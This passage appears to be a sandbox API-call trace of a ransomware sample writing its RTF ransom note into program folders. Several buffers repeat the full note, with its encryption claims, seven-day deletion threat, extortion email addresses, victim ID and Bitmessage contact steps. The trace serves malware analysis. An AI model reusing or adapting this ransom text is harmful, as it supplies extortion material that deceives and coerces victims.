b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nIÁ\x01", lpUsedDefaultChar=0x0) returned 8717 [0218.018] WriteFile (in: hFile=0x2d0, lpBuffer=0x2470908*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2470908*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0218.019] CloseHandle (hObject=0x2d0) returned 1 [0218.019] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\#readme_eman#.rtf")) returned 0xffffffff [0218.019] GetLastError () returned 0x2 [0218.019] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0218.217] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0218.217] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0218.217] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4ac18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. 